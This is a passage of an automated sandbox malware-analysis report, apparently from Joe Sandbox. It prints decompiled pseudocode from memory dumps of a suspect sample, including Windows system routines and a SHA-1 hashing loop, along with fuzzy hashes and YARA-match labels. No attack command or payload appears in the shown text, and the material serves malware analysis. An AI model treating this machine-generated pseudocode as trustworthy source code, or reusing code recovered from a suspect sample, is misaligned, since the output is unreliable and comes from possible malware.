                            • Opcode Fuzzy Hash: 6453d8cd1d5af1a213d5a1823e8ad9c0d9c4bc945ac7d347679fbfab909a0037
                            • Instruction Fuzzy Hash: FEF14C72D00629EFCF11DF98C984AEEFBB9FF48650F15006AE905A7215E7749E01CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 60%
                            			E017DE539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
                            				signed int _v20;
                            				char _v24;
                            				signed int _v40;
                            				char _v44;
                            				intOrPtr _v48;
                            				signed int _v52;
                            				unsigned int _v56;
                            				char _v60;
                            				signed int _v64;
                            				char _v68;
                            				signed int _v72;
                            				void* __ebx;
                            				void* __edi;
                            				char _t87;
                            				signed int _t90;
                            				signed int _t94;
                            				signed int _t100;
                            				intOrPtr* _t113;
                            				signed int _t122;
                            				void* _t132;
                            				void* _t135;
                            				signed int _t139;
                            				signed int* _t141;
                            				signed int _t146;
                            				signed int _t147;
                            				void* _t153;
                            				signed int _t155;
                            				signed int _t159;
                            				char _t166;
                            				void* _t172;
                            				void* _t176;
                            				signed int _t177;
                            				intOrPtr* _t179;
                            
                            				_t179 = __ecx;
                            				_v48 = __edx;
                            				_v68 = 0;
                            				_v72 = 0;
                            				_push(__ecx[1]);
                            				_push( *__ecx);
                            				_push(0);
                            				_t153 = 0x14;
                            				_t135 = _t153;
                            				_t132 = E017DBBBB(_t135, _t153);
                            				if(_t132 == 0) {
                            					_t166 = _v68;
                            					goto L43;
                            				} else {
                            					_t155 = 0;
                            					_v52 = 0;
                            					asm("stosd");
                            					asm("stosd");
                            					asm("stosd");
                            					asm("stosd");
                            					asm("stosd");
                            					_v56 = __ecx[1];
                            					if( *__ecx >> 8 < 2) {
                            						_t155 = 1;
                            						_v52 = 1;
                            					}
                            					_t139 = _a4;
                            					_t87 = (_t155 << 0xc) + _t139;
                            					_v60 = _t87;
                            					if(_t87 < _t139) {
                            						L11:
                            						_t166 = _v68;
                            						L12:
                            						if(_t132 != 0) {
                            							L017DBCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
                            						}
                            						L43:
                            						if(_v72 != 0) {
                            							_push( *((intOrPtr*)(_t179 + 4)));
                            							_push( *_t179);
                            							_push(0x8000);
                            							L017DAFDE( &_v72,  &_v60);
                            						}
                            						L46:
                            						return _t166;
                            					}
                            					_t90 =  *(_t179 + 0xc) & 0x40000000;
                            					asm("sbb edi, edi");
                            					_t172 = ( ~_t90 & 0x0000003c) + 4;
                            					if(_t90 != 0) {
                            						_push(0);
                            						_push(0x14);
                            						_push( &_v44);
                            						_push(3);
                            						_push(_t179);
                            						_push(0xffffffff);
                            						if(L01759730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
                            							_push(_t139);
                            							E017DA80D(_t179, 1, _v40, 0);
                            							_t172 = 4;
                            						}
                            					}
                            					_t141 =  &_v72;
                            					if(E017DA854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
                            						_v64 = _a4;
                            						_t94 =  *(_t179 + 0xc) & 0x40000000;
                            						asm("sbb edi, edi");
                            						_t176 = ( ~_t94 & 0x0000003c) + 4;
                            						if(_t94 != 0) {
                            							_push(0);
                            							_push(0x14);
                            							_push( &_v24);
                            							_push(3);
                            							_push(_t179);
                            							_push(0xffffffff);
                            							if(L01759730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
                            								_push(_t141);
                            								E017DA80D(_t179, 1, _v20, 0);
                            								_t176 = 4;
                            							}
                            						}
                            						if(E017DA854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
                            							goto L11;
                            						} else {
                            							_t177 = _v64;
                            							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
                            							_t100 = _v52 + _v52;
                            							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
                            							 *(_t132 + 0x10) = _t146;
                            							asm("bsf eax, [esp+0x18]");
                            							_v52 = _t100;
                            							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
                            							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
                            							_t47 =  &_a8;
                            							 *_t47 = _a8 & 0x00000001;
                            							if( *_t47 == 0) {
                            								E01732280(_t179 + 0x30, _t179 + 0x30);
                            							}
                            							_t147 =  *(_t179 + 0x34);
                            							_t159 =  *(_t179 + 0x38) & 1;
                            							_v68 = 0;
                            							if(_t147 == 0) {
                            								L35:
                            								E0172B090(_t179 + 0x34, _t147, _v68, _t132);
                            								if(_a8 == 0) {
                            									L0172FFB0(_t132, _t177, _t179 + 0x30);
                            								}
                            								asm("lock xadd [eax], ecx");
                            								asm("lock xadd [eax], edx");
                            								_t132 = 0;
                            								_v72 = _v72 & 0;
                            								_v68 = _v72;
                            								if(E01737D50() == 0) {
                            									_t113 = 0x7ffe0388;
                            								} else {
                            									_t177 = _v64;
                            									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                            								}
                            								if( *_t113 == _t132) {
                            									_t166 = _v68;
                            									goto L46;
                            								} else {
                            									_t166 = _v68;
                            									L017CFEC0(_t132, _t179, _t166, _t177 + 0x1000);
                            									goto L12;
                            								}
                            							} else {
                            								L23:
                            								while(1) {
                            									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
                            										_t122 =  *_t147;
                            										if(_t159 == 0) {
                            											L32:
                            											if(_t122 == 0) {
                            												L34:
                            												_v68 = 0;
                            												goto L35;
                            											}
                            											L33:
                            											_t147 = _t122;
                            											continue;
                            										}
                            										if(_t122 == 0) {
                            											goto L34;
                            										}
                            										_t122 = _t122 ^ _t147;
                            										goto L32;
                            									}
                            									_t122 =  *(_t147 + 4);
                            									if(_t159 == 0) {
                            										L27:
                            										if(_t122 != 0) {
                            											goto L33;
                            										}
                            										L28:
                            										_v68 = 1;
                            										goto L35;
                            									}
                            									if(_t122 == 0) {
                            										goto L28;
                            									}
                            									_t122 = _t122 ^ _t147;
                            									goto L27;
                            								}
                            							}
                            						}
                            					}
                            					_v72 = _v72 & 0x00000000;
                            					goto L11;
                            				}
                            			}


                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID:
                            • String ID: `$`
                            • API String ID: 0-197956300
                            • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                            • Instruction ID: 0a5dfaa28546267fc39bcaea0cfb54760733c9f0bd12521aee533e3fe75d39d2
                            • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                            • Instruction Fuzzy Hash: E5917F3120434A9BE766CE29C845B1BFBF5BF84724F14892DFA95CB280EB74E904CB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 77%
                            			E017951BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                            				signed short* _t63;
                            				signed int _t64;
                            				signed int _t65;
                            				signed int _t67;
                            				intOrPtr _t74;
                            				intOrPtr _t84;
                            				intOrPtr _t88;
                            				intOrPtr _t94;
                            				void* _t100;
                            				void* _t103;
                            				intOrPtr _t105;
                            				signed int _t106;
                            				short* _t108;
                            				signed int _t110;
                            				signed int _t113;
                            				signed int* _t115;
                            				signed short* _t117;
                            				void* _t118;
                            				void* _t119;
                            
                            				_push(0x80);
                            				_push(0x17f05f0);
                            				E0176D0E8(__ebx, __edi, __esi);
                            				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
                            				_t115 =  *(_t118 + 0xc);
                            				 *(_t118 - 0x7c) = _t115;
                            				 *((char*)(_t118 - 0x65)) = 0;
                            				 *((intOrPtr*)(_t118 - 0x64)) = 0;
                            				_t113 = 0;
                            				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
                            				 *((intOrPtr*)(_t118 - 4)) = 0;
                            				_t100 = __ecx;
                            				if(_t100 == 0) {
                            					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                            					L0172EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                            					 *((char*)(_t118 - 0x65)) = 1;
                            					_t63 =  *(_t118 - 0x90);
                            					_t101 = _t63[2];
                            					_t64 =  *_t63 & 0x0000ffff;
                            					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                            					L20:
                            					_t65 = _t64 >> 1;
                            					L21:
                            					_t108 =  *((intOrPtr*)(_t118 - 0x80));
                            					if(_t108 == 0) {
                            						L27:
                            						 *_t115 = _t65 + 1;
                            						_t67 = 0xc0000023;
                            						L28:
                            						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
                            						L29:
                            						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
                            						E017953CA(0);
                            						return E0176D130(0, _t113, _t115);
                            					}
                            					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
                            						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
                            							 *_t108 = 0;
                            						}
                            						goto L27;
                            					}
                            					 *_t115 = _t65;
                            					_t115 = _t65 + _t65;
                            					E0175F3E0(_t108, _t101, _t115);
                            					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
                            					_t67 = 0;
                            					goto L28;
                            				}
                            				_t103 = _t100 - 1;
                            				if(_t103 == 0) {
                            					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
                            					_t74 = L01733690(1, _t117, 0x16f1810, _t118 - 0x74);
                            					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
                            					_t101 = _t117[2];
                            					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                            					if(_t74 < 0) {
                            						_t64 =  *_t117 & 0x0000ffff;
                            						_t115 =  *(_t118 - 0x7c);
                            						goto L20;
                            					}
                            					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
                            					_t115 =  *(_t118 - 0x7c);
                            					goto L21;
                            				}
                            				if(_t103 == 1) {
                            					_t105 = 4;
                            					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
                            					 *((intOrPtr*)(_t118 - 0x70)) = 0;
                            					_push(_t118 - 0x70);
                            					_push(0);
                            					_push(0);
                            					_push(_t105);
                            					_push(_t118 - 0x78);
                            					_push(0x6b);
                            					 *((intOrPtr*)(_t118 - 0x64)) = E0175AA90();
                            					 *((intOrPtr*)(_t118 - 0x64)) = 0;
                            					_t113 = L01734620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
                            					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
                            					if(_t113 != 0) {
                            						_push(_t118 - 0x70);
                            						_push( *((intOrPtr*)(_t118 - 0x70)));
                            						_push(_t113);
                            						_push(4);
                            						_push(_t118 - 0x78);
                            						_push(0x6b);
                            						_t84 = E0175AA90();
                            						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
                            						if(_t84 < 0) {
                            							goto L29;
                            						}
                            						_t110 = 0;
                            						_t106 = 0;
                            						while(1) {
                            							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
                            							 *(_t118 - 0x88) = _t106;
                            							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
                            								break;
                            							}
                            							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
                            							_t106 = _t106 + 1;
                            						}
                            						_t88 = E0179500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
                            						_t119 = _t119 + 0x1c;
                            						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
                            						if(_t88 < 0) {
                            							goto L29;
                            						}
                            						_t101 = _t118 - 0x3c;
                            						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
                            						goto L21;
                            					}
                            					_t67 = 0xc0000017;
                            					goto L28;
                            				}
                            				_push(0);
                            				_push(0x20);
                            				_push(_t118 - 0x60);
                            				_push(0x5a);
                            				_t94 = E01759860();
                            				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
                            				if(_t94 < 0) {
                            					goto L29;
                            				}
                            				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
                            					_t101 = L"Legacy";
                            					_push(6);
                            				} else {
                            					_t101 = L"UEFI";
                            					_push(4);
                            				}
                            				_pop(_t65);
                            				goto L21;
                            			}























                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID: Legacy$UEFI
                            • API String ID: 2994545307-634100481
                            • Opcode ID: 2bb6dd338047ff418d3c73a257a3d7e7d2d27bd314de33a06ac3f6e096e1ca87
                            • Instruction ID: 09b59afc1992fe8eac3696c898fa80d6374a53c5a99a882e2cf94fc5af17172f
                            • Opcode Fuzzy Hash: 2bb6dd338047ff418d3c73a257a3d7e7d2d27bd314de33a06ac3f6e096e1ca87
                            • Instruction Fuzzy Hash: F4518CB1A046199FDF26DFA8D840AAEFBF8FF48704F14406EE649EB241D6709904CB10
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 73%
                            			E00A89E50(signed int* _a4) {
                            				signed int _v8;
                            				signed int _v12;
                            				signed int _v16;
                            				char _v304;
                            				signed char* _t277;
                            				signed int* _t278;
                            				signed int _t279;
                            				signed int _t285;
                            				signed int _t288;
                            				signed int _t292;
                            				signed int _t295;
                            				signed int _t299;
                            				signed int _t303;
                            				signed int _t305;
                            				signed int _t311;
                            				signed int _t318;
                            				signed int _t320;
                            				signed int _t323;
                            				signed int _t325;
                            				signed int _t334;
                            				signed int _t340;
                            				signed int _t341;
                            				signed int _t346;
                            				signed int _t353;
                            				signed int _t357;
                            				signed int _t358;
                            				signed int _t362;
                            				signed int _t365;
                            				signed int _t369;
                            				signed int _t370;
                            				signed int _t399;
                            				signed int _t404;
                            				signed int _t410;
                            				signed int _t413;
                            				signed int _t420;
                            				signed int _t423;
                            				signed int _t432;
                            				signed int _t434;
                            				signed int _t437;
                            				signed int _t445;
                            				signed int _t459;
                            				signed int _t462;
                            				signed int _t463;
                            				signed int _t464;
                            				signed int _t470;
                            				signed int _t478;
                            				signed int _t479;
                            				signed int* _t480;
                            				signed int* _t481;
                            				signed int _t488;
                            				signed int _t491;
                            				signed int _t496;
                            				signed int _t499;
                            				signed int _t502;
                            				signed int _t505;
                            				signed int _t506;
                            				signed int _t510;
                            				signed int _t522;
                            				signed int _t525;
                            				signed int _t532;
                            				void* _t536;
                            
                            				_t481 = _a4;
                            				_t353 = 0;
                            				_t2 =  &(_t481[7]); // 0x1b
                            				_t277 = _t2;
                            				do {
                            					 *(_t536 + _t353 * 4 - 0x14c) = ((( *(_t277 - 1) & 0x000000ff) << 0x00000008 |  *_t277 & 0x000000ff) << 0x00000008 | _t277[1] & 0x000000ff) << 0x00000008 | _t277[2] & 0x000000ff;
                            					 *(_t536 + _t353 * 4 - 0x148) = (((_t277[3] & 0x000000ff) << 0x00000008 | _t277[4] & 0x000000ff) << 0x00000008 | _t277[5] & 0x000000ff) << 0x00000008 | _t277[6] & 0x000000ff;
                            					 *(_t536 + _t353 * 4 - 0x144) = (((_t277[7] & 0x000000ff) << 0x00000008 | _t277[8] & 0x000000ff) << 0x00000008 | _t277[9] & 0x000000ff) << 0x00000008 | _t277[0xa] & 0x000000ff;
                            					 *(_t536 + _t353 * 4 - 0x140) = (((_t277[0xb] & 0x000000ff) << 0x00000008 | _t277[0xc] & 0x000000ff) << 0x00000008 | _t277[0xd] & 0x000000ff) << 0x00000008 | _t277[0xe] & 0x000000ff;
                            					_t353 = _t353 + 4;
                            					_t277 =  &(_t277[0x10]);
                            				} while (_t353 < 0x10);
                            				_t278 =  &_v304;
                            				_v8 = 0x10;
                            				do {
                            					_t399 =  *(_t278 - 0x18);
                            					_t459 =  *(_t278 - 0x14);
                            					_t357 =  *(_t278 - 0x20) ^ _t278[5] ^  *_t278 ^ _t399;
                            					asm("rol ecx, 1");
                            					asm("rol ebx, 1");
                            					_t278[9] =  *(_t278 - 0x1c) ^ _t278[6] ^ _t278[1] ^ _t459;
                            					_t278[8] = _t357;
                            					_t318 = _t278[7] ^  *(_t278 - 0x10) ^ _t278[2];
                            					_t278 =  &(_t278[4]);
                            					asm("rol ebx, 1");
                            					asm("rol edx, 1");
                            					_t46 =  &_v8;
                            					 *_t46 = _v8 - 1;
                            					_t278[6] = _t318 ^ _t399;
                            					_t278[7] =  *(_t278 - 0x1c) ^  *(_t278 - 4) ^ _t357 ^ _t459;
                            				} while ( *_t46 != 0);
                            				_t320 =  *_t481;
                            				_t279 = _t481[1];
                            				_t358 = _t481[2];
                            				_t404 = _t481[3];
                            				_v12 = _t320;
                            				_v16 = _t481[4];
                            				_v8 = 0;
                            				do {
                            					asm("rol ebx, 0x5");
                            					_t462 = _v8;
                            					_t488 = _t320 + ( !_t279 & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x14c)) + _v16 + 0x5a827999;
                            					_t323 = _v12;
                            					asm("ror eax, 0x2");
                            					_v16 = _t404;
                            					_v12 = _t488;
                            					asm("rol esi, 0x5");
                            					_v8 = _t358;
                            					_t410 = _t488 + ( !_t323 & _t358 | _t279 & _t323) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x148)) + _v16 + 0x5a827999;
                            					_t491 = _t279;
                            					asm("ror ebx, 0x2");
                            					_v16 = _v8;
                            					_t362 = _v12;
                            					_v8 = _t323;
                            					_t325 = _v8;
                            					_v12 = _t410;
                            					asm("rol edx, 0x5");
                            					_t285 = _t410 + ( !_t362 & _t491 | _t323 & _t362) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x144)) + _v16 + 0x5a827999;
                            					_t413 = _v12;
                            					_v16 = _t491;
                            					asm("ror ecx, 0x2");
                            					_v8 = _t362;
                            					_v12 = _t285;
                            					asm("rol eax, 0x5");
                            					_v16 = _t325;
                            					_t496 = _t285 + ( !_t413 & _t325 | _t362 & _t413) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x140)) + _v16 + 0x5a827999;
                            					_t358 = _v12;
                            					_t288 = _v8;
                            					asm("ror edx, 0x2");
                            					_v8 = _t413;
                            					_v12 = _t496;
                            					asm("rol esi, 0x5");
                            					_v16 = _t288;
                            					_t279 = _v12;
                            					_t499 = _t496 + ( !_t358 & _t288 | _t413 & _t358) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x13c)) + _v16 + 0x5a827999;
                            					_t404 = _v8;
                            					asm("ror ecx, 0x2");
                            					_t463 = _t462 + 5;
                            					_t320 = _t499;
                            					_v12 = _t320;
                            					_v8 = _t463;
                            				} while (_t463 < 0x14);
                            				_t464 = 0x14;
                            				do {
                            					asm("rol esi, 0x5");
                            					asm("ror eax, 0x2");
                            					_v16 = _t404;
                            					_t502 = _t499 + (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
                            					_t334 = _v12;
                            					_v12 = _t502;
                            					asm("rol esi, 0x5");
                            					_t420 = _t502 + (_t358 ^ _t279 ^ _t334) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
                            					asm("ror ebx, 0x2");
                            					_t505 = _t279;
                            					_v16 = _t358;
                            					_t365 = _v12;
                            					_v12 = _t420;
                            					asm("rol edx, 0x5");
                            					asm("ror ecx, 0x2");
                            					_t292 = _t420 + (_t279 ^ _t334 ^ _t365) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
                            					_t423 = _v12;
                            					_v8 = _t334;
                            					_v8 = _t365;
                            					_v12 = _t292;
                            					asm("rol eax, 0x5");
                            					_t464 = _t464 + 5;
                            					_t358 = _v12;
                            					asm("ror edx, 0x2");
                            					_t146 = _t505 + 0x6ed9eba1; // 0x6ed9eb9f
                            					_t506 = _t292 + (_t334 ^ _v8 ^ _t423) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x154)) + _t146;
                            					_t295 = _v8;
                            					_v8 = _t423;
                            					_v12 = _t506;
                            					asm("rol esi, 0x5");
                            					_t404 = _v8;
                            					_t499 = _t506 + (_t295 ^ _v8 ^ _t358) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x150)) + _t334 + 0x6ed9eba1;
                            					_v16 = _t295;
                            					_t279 = _v12;
                            					asm("ror ecx, 0x2");
                            					_v12 = _t499;
                            				} while (_t464 < 0x28);
                            				_v8 = 0x28;
                            				do {
                            					asm("rol esi, 0x5");
                            					_v16 = _t404;
                            					asm("ror eax, 0x2");
                            					_t510 = ((_t358 | _t279) & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _v8 * 4 - 0x14c)) + _t499 + _v16 - 0x70e44324;
                            					_t470 = _v12;
                            					_v12 = _t510;
                            					asm("rol esi, 0x5");
                            					_t340 = _v8;
                            					asm("ror edi, 0x2");
                            					_t432 = ((_t279 | _t470) & _t358 | _t279 & _t470) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x148)) + _t510 + _v16 - 0x70e44324;
                            					_v16 = _t358;
                            					_t369 = _v12;
                            					_v12 = _t432;
                            					asm("rol edx, 0x5");
                            					_v8 = _t279;
                            					_t434 = ((_t470 | _t369) & _t279 | _t470 & _t369) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x144)) + _t432 + _v16 - 0x70e44324;
                            					asm("ror ecx, 0x2");
                            					_v16 = _v8;
                            					_t299 = _v12;
                            					_v8 = _t470;
                            					_v12 = _t434;
                            					asm("rol edx, 0x5");
                            					asm("ror eax, 0x2");
                            					_t522 = ((_t369 | _t299) & _t470 | _t369 & _t299) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x140)) + _t434 + _v16 - 0x70e44324;
                            					_v16 = _v8;
                            					_t437 = _t369;
                            					_t358 = _v12;
                            					_v8 = _t437;
                            					_v12 = _t522;
                            					asm("rol esi, 0x5");
                            					_v16 = _v8;
                            					_t499 = ((_t299 | _t358) & _t437 | _t299 & _t358) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x13c)) + _t522 + _v16 - 0x70e44324;
                            					_t404 = _t299;
                            					_t279 = _v12;
                            					asm("ror ecx, 0x2");
                            					_v12 = _t499;
                            					_t341 = _t340 + 5;
                            					_v8 = _t341;
                            				} while (_t341 < 0x3c);
                            				_t478 = 0x3c;
                            				_v8 = 0x3c;
                            				do {
                            					asm("rol esi, 0x5");
                            					_t479 = _v8;
                            					asm("ror eax, 0x2");
                            					_t525 = (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t478 * 4 - 0x14c)) + _t499 + _v16 - 0x359d3e2a;
                            					_t346 = _v12;
                            					_v16 = _t404;
                            					_v12 = _t525;
                            					asm("rol esi, 0x5");
                            					asm("ror ebx, 0x2");
                            					_t445 = (_t358 ^ _t279 ^ _t346) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x148)) + _t525 + _v16 - 0x359d3e2a;
                            					_v16 = _t358;
                            					_t370 = _v12;
                            					_v12 = _t445;
                            					asm("rol edx, 0x5");
                            					_v16 = _t279;
                            					asm("ror ecx, 0x2");
                            					_t303 = (_t279 ^ _t346 ^ _t370) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x144)) + _t445 + _v16 - 0x359d3e2a;
                            					_t404 = _v12;
                            					_v12 = _t303;
                            					asm("rol eax, 0x5");
                            					_v16 = _t346;
                            					_t532 = (_t346 ^ _t370 ^ _t404) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x140)) + _t303 + _v16 - 0x359d3e2a;
                            					_t305 = _t370;
                            					_v8 = _t346;
                            					asm("ror edx, 0x2");
                            					_v8 = _t370;
                            					_t358 = _v12;
                            					_v12 = _t532;
                            					asm("rol esi, 0x5");
                            					_t478 = _t479 + 5;
                            					_t499 = (_t305 ^ _t404 ^ _t358) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x13c)) + _t532 + _v16 - 0x359d3e2a;
                            					_v16 = _t305;
                            					_t279 = _v12;
                            					asm("ror ecx, 0x2");
                            					_v8 = _t404;
                            					_v12 = _t499;
                            					_v8 = _t478;
                            				} while (_t478 < 0x50);
                            				_t480 = _a4;
                            				_t480[2] = _t480[2] + _t358;
                            				_t480[3] = _t480[3] + _t404;
                            				_t311 = _t480[4] + _v16;
                            				 *_t480 =  *_t480 + _t499;
                            				_t480[1] = _t480[1] + _t279;
                            				_t480[4] = _t311;
                            				_t480[0x17] = 0;
                            				return _t311;
                            			}
































































                            0x00a8a268
                            0x00a8a26b
                            0x00a8a26e
                            0x00a8a271
                            0x00a8a27a
                            0x00a8a27f
                            0x00a8a282
                            0x00a8a282
                            0x00a8a295
                            0x00a8a298
                            0x00a8a29b
                            0x00a8a2a2
                            0x00a8a2a5
                            0x00a8a2a8
                            0x00a8a2ab
                            0x00a8a2be
                            0x00a8a2c1
                            0x00a8a2cc
                            0x00a8a2cf
                            0x00a8a2db
                            0x00a8a2de
                            0x00a8a2e4
                            0x00a8a2e7
                            0x00a8a2ea
                            0x00a8a2f1
                            0x00a8a301
                            0x00a8a304
                            0x00a8a30a
                            0x00a8a30d
                            0x00a8a314
                            0x00a8a316
                            0x00a8a319
                            0x00a8a31c
                            0x00a8a31f
                            0x00a8a322
                            0x00a8a329
                            0x00a8a338
                            0x00a8a33b
                            0x00a8a342
                            0x00a8a345
                            0x00a8a348
                            0x00a8a34b
                            0x00a8a34e
                            0x00a8a351
                            0x00a8a354
                            0x00a8a35d
                            0x00a8a36e
                            0x00a8a376
                            0x00a8a37c
                            0x00a8a37f
                            0x00a8a381
                            0x00a8a384
                            0x00a8a387
                            0x00a8a394

                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                            • Associated: 00000000.00000002.288819285.0000000000A80000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.288891710.0000000000A9F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.288903814.0000000000AA0000.00000020.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_a80000_7pECKdsaig.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: (
                            • API String ID: 0-3887548279
                            • Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                            • Instruction ID: 9cc5312d71b5b4870d0ff9dad73eecfb1d0d60de741bfe028ff4e2e79d66709d
                            • Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                            • Instruction Fuzzy Hash: 67021CB6E006189FDB54CF9AC8805DDFBF2FF88314F1AC1AAD859A7315D6746A418F80
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 78%
                            			E0171B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
                            				signed int _t65;
                            				signed short _t69;
                            				intOrPtr _t70;
                            				signed short _t85;
                            				void* _t86;
                            				signed short _t89;
                            				signed short _t91;
                            				intOrPtr _t92;
                            				intOrPtr _t97;
                            				intOrPtr* _t98;
                            				signed short _t99;
                            				signed short _t101;
                            				void* _t102;
                            				char* _t103;
                            				signed short _t104;
                            				intOrPtr* _t110;
                            				void* _t111;
                            				void* _t114;
                            				intOrPtr* _t115;
                            
                            				_t109 = __esi;
                            				_t108 = __edi;
                            				_t106 = __edx;
                            				_t95 = __ebx;
                            				_push(0x90);
                            				_push(0x17ef7a8);
                            				E0176D0E8(__ebx, __edi, __esi);
                            				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
                            				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
                            				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
                            				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
                            				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
                            				if(__edx == 0xffffffff) {
                            					L6:
                            					_t97 =  *((intOrPtr*)(_t114 - 0x78));
                            					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
                            					__eflags = _t65 & 0x00000002;
                            					if((_t65 & 0x00000002) != 0) {
                            						L3:
                            						L4:
                            						return E0176D130(_t95, _t108, _t109);
                            					}
                            					 *(_t97 + 0xfca) = _t65 | 0x00000002;
                            					_t108 = 0;
                            					_t109 = 0;
                            					_t95 = 0;
                            					__eflags = 0;
                            					while(1) {
                            						__eflags = _t95 - 0x200;
                            						if(_t95 >= 0x200) {
                            							break;
                            						}
                            						E0175D000(0x80);
                            						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
                            						_t108 = _t115;
                            						_t95 = _t95 - 0xffffff80;
                            						_t17 = _t114 - 4;
                            						 *_t17 =  *(_t114 - 4) & 0x00000000;
                            						__eflags =  *_t17;
                            						_t106 =  *((intOrPtr*)(_t114 - 0x84));
